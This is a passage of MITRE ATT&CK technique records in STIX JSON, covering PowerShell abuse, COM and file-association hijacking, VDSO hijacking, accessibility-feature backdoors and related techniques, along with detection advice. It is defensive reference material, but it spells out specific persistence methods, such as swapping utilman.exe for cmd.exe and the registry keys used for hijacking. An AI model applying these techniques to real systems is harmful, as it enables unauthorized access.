PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Mayuresh Dani, Qualys", "Praetorian", "Ross Brittain"], "x_mitre_deprecated": false, "x_mitre_detection": "If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nMonitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.\n\nConsider monitoring for Windows event ID (EID) 400, which shows the version of PowerShell executing in the EngineVersion field (which may also be relevant to detecting a potential [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)) as well as if PowerShell is running locally or remotely in the HostName field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.(Citation: inv_ps_attacks)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", "created": "2020-03-09T13:48:55.078Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1059/001", "external_id": "T1059.001"}, {"source_name": "Microsoft PSfromCsharp APR 2014", "description": "Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019.", "url": "https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/"}, {"source_name": "SilentBreak Offensive PS Dec 2015", "description": "Christensen, L.. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018.", "url": "https://web.archive.org/web/20190508170150/https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/"}, {"source_name": "FireEye PowerShell Logging 2016", "description": "Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016.", "url": "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html"}, {"source_name": "Github PSAttack", "description": "Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.", "url": "https://github.com/jaredhaight/PSAttack"}, {"source_name": "inv_ps_attacks", "description": "Hastings, M. (2014, July 16). Investigating PowerShell Attacks. Retrieved December 1, 2021.", "url": "https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/"}, {"source_name": "Malware Archaeology PowerShell Cheat Sheet", "description": "Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.", "url": "http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf"}, {"source_name": "TechNet PowerShell", "description": "Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016.", "url": "https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx"}, {"source_name": "Sixdub PowerPick Jan 2016", "description": "Warner, J.. (2015, January 6). Inexorable PowerShell \u2013 A Red Teamer\u2019s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018.", "url": "https://web.archive.org/web/20160327101330/http://www.sixdub.net/?p=367"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Shortcut Modification", "description": "Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Travis Smith, Tripwire"], "x_mitre_detection": "Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--970cdb5c-02fb-4c38-b17e-d6327cf3c810", "created": "2017-05-31T21:30:30.757Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1023", "external_id": "T1023"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/132.html", "external_id": "CAPEC-132"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Change Default File Association", "description": "Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.(Citation: Microsoft Change Default Programs)(Citation: Microsoft File Handlers)(Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n\nSystem file associations are listed under HKEY_CLASSES_ROOT\\.[extension], for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\\\[handler]\\shell\\\\[action]\\command. For example: \n\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.(Citation: TrendMicro TROJ-FAKEAV OCT 2012)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Travis Smith, Tripwire", "Stefan Kanthak"], "x_mitre_deprecated": false, "x_mitre_detection": "Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process.\n\nUser file association preferences are stored under [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts and override associations configured under [HKEY_CLASSES_ROOT]. Changes to a user's preference will occur under this entry's subkeys.\n\nAlso look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "SYSTEM", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c", "created": "2020-01-24T13:40:47.282Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1546/001", "external_id": "T1546.001"}, {"source_name": "Microsoft Change Default Programs", "description": "Microsoft. (n.d.). Change which programs Windows 7 uses by default. Retrieved July 26, 2016.", "url": "https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs"}, {"source_name": "Microsoft File Handlers", "description": "Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. Retrieved November 13, 2014.", "url": "http://msdn.microsoft.com/en-us/library/bb166549.aspx"}, {"source_name": "Microsoft Assoc Oct 2017", "description": "Plett, C. et al.. (2017, October 15). assoc. Retrieved August 7, 2018.", "url": "https://docs.microsoft.com/windows-server/administration/windows-commands/assoc"}, {"source_name": "TrendMicro TROJ-FAKEAV OCT 2012", "description": "Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August 8, 2018.", "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-11-08T14:00:00.188Z", "name": "VDSO Hijacking", "description": "Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nVDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009)(Citation: Backtrace VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 2014)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)(Citation: GNU Acct)(Citation: RHEL auditd)(Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Application control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5", "created": "2020-01-14T01:35:00.781Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1055/014", "external_id": "T1055.014"}, {"source_name": "Backtrace VDSO", "description": "backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved June 15, 2020.", "url": "https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/"}, {"source_name": "Syscall 2014", "description": "Drysdale, D. (2014, July 16). Anatomy of a system call, part 2. Retrieved June 16, 2020.", "url": "https://lwn.net/Articles/604515/"}, {"source_name": "GNU Acct", "description": "GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.", "url": "https://www.gnu.org/software/acct/"}, {"source_name": "RHEL auditd", "description": "Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.", "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing"}, {"source_name": "ArtOfMemoryForensics", "description": "Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017."}, {"source_name": "ELF Injection May 2009", "description": "O'Neill, R. (2009, May). Modern Day ELF Runtime infection via GOT poisoning. Retrieved March 15, 2020.", "url": "https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html"}, {"source_name": "VDSO Aug 2005", "description": "Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved June 16, 2020.", "url": "https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/"}, {"source_name": "Chokepoint preload rootkits", "description": "stderr. (2014, February 14). Detecting Userland Preload Rootkits. Retrieved December 20, 2017.", "url": "http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Multiband Communication", "description": "**This technique has been deprecated and should no longer be used.**\n\nSome adversaries may split communications between different protocols. There could be one protocol for inbound command and control and another for outbound data, allowing it to bypass certain firewall restrictions. The split could also be random to simply avoid data threshold alerts on any one communication.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) Correlating alerts between multiple communication channels can further help identify command-and-control behavior.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--99709758-2b96-48f2-a68a-ad7fbd828091", "created": "2017-05-31T21:30:32.259Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1026", "external_id": "T1026"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-10-13T17:57:08.233Z", "name": "Adversary-in-the-Middle", "description": "Adversaries with privileged network access may seek to modify network traffic in real time using adversary-in-the-middle (AiTM) attacks. (Citation: Gabriel Sanchez October 2017) This type of attack allows the adversary to intercept traffic to and/or from a particular device on the network. If a AiTM attack is established, then the adversary has the ability to block, log, modify, or inject traffic into the communication stream. There are several ways to accomplish this attack, but some of the most-common are Address Resolution Protocol (ARP) poisoning and the use of a proxy. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) \n\nAn AiTM attack may allow an adversary to perform the following attacks: \n[Block Reporting Message](https://attack.mitre.org/techniques/T0804), [Spoof Reporting Message](https://attack.mitre.org/techniques/T0856), [Modify Parameter](https://attack.mitre.org/techniques/T0836), [Unauthorized Command Message](https://attack.mitre.org/techniques/T0855)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Conrad Layne - GE Digital"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "2.0", "x_mitre_data_sources": ["Windows Registry: Windows Registry Key Modification", "Process: Process Creation", "Network Traffic: Network Traffic Flow", "Service: Service Creation", "Network Traffic: Network Traffic Content", "Application Log: Application Log Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0830", "external_id": "T0830"}, {"source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"}, {"source_name": "Gabriel Sanchez October 2017", "description": "Gabriel Sanchez 2017, October Man-In-The-Middle Attack Against Modbus TCP Illustrated with Wireshark Retrieved. 2020/01/05 ", "url": "https://www.sans.org/reading-room/whitepapers/ICS/man-in-the-middle-attack-modbus-tcp-illustrated-wireshark-38095"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-01-18T17:23:22.591Z", "name": "File Transfer Protocols", "description": "Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMB(Citation: US-CERT TA18-074A), FTP(Citation: ESET Machete July 2019), FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", "created": "2020-03-15T16:16:25.763Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1071/002", "external_id": "T1071.002"}, {"source_name": "ESET Machete July 2019", "description": "ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019.", "url": "https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}, {"source_name": "US-CERT TA18-074A", "description": "US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-074A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Component Object Model Hijacking", "description": "The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["ENDGAME"], "x_mitre_detection": "There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations replacing know binary paths with unknown paths. Even though some third party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\. (Citation: Elastic COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated. Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Autoruns Analysis"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9b52fca7-1a36-4da0-b62d-da5bd83b4d69", "created": "2017-05-31T21:31:33.979Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1122", "external_id": "T1122"}, {"source_name": "Microsoft Component Object Model", "description": "Microsoft. (n.d.). The Component Object Model. Retrieved August 18, 2016.", "url": "https://msdn.microsoft.com/library/ms694363.aspx"}, {"source_name": "GDATA COM Hijacking", "description": "G DATA. (2014, October). COM Object hijacking: the discreet way of persistence. Retrieved August 13, 2016.", "url": "https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence"}, {"source_name": "Elastic COM Hijacking", "description": "Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting Persistence & Evasion with the COM. Retrieved September 15, 2016.", "url": "https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Accessibility Features", "description": "Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nTwo common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)\n\nDepending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods:\n\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nFor the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures \"cmd.exe,\" or another program that provides backdoor access, as a \"debugger\" for the accessibility program (e.g., \"utilman.exe\"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the \"debugger\" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nOther accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)\n\n* On-Screen Keyboard: C:\\Windows\\System32\\osk.exe\n* Magnifier: C:\\Windows\\System32\\Magnify.exe\n* Narrator: C:\\Windows\\System32\\Narrator.exe\n* Display Switcher: C:\\Windows\\System32\\DisplaySwitch.exe\n* App Switcher: C:\\Windows\\System32\\AtBroker.exe", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Paul Speulstra, AECOM Global Security Operations Center"], "x_mitre_detection": "Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_effective_permissions": ["SYSTEM"], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9b99b83a-1aac-4e29-b975-b374950551a3", "created": "2017-05-31T21:30:26.946Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1015", "external_id": "T1015"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/558.html", "external_id": "CAPEC-558"}, {"source_name": "FireEye Hikit Rootkit", "description": "Glyer, C., Kazanciyan, R. (2012, August 20). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.", "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html"}, {"source_name": "DEFCON2016 Sticky Keys", "description": "Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to the Kingdom. Retrieved July 5, 2017.", "url": "https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom"}, {"source_name": "Tilbury 2014", "description": "Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 12, 2014.", "url": "http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-10-15T11:45:21.555Z", "name": "Exploitation for Credential Access", "description": "Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\u00a0\n\nCredentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain authenticated access to systems. One example of this is `MS14-068`, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Another example of this is replay attacks, in which the adversary intercepts data packets sent between parties and then later replays these packets. If services don't properly validate authentication requests, these replayed packets may allow an adversary to impersonate one of the parties and gain unauthorized access or privileges.(Citation: Bugcrowd Replay Attack)(Citation: Comparitech Replay Attack)(Citation: Microsoft Midnight Blizzard Replay Attack)\n\nSuch exploitation has been demonstrated in cloud environments as well. For example, adversaries have exploited vulnerabilities in public cloud infrastructure that allowed for unintended authentication token creation and renewal.(Citation: Storm-0558 techniques for unauthorized email access)\n\nExploitation 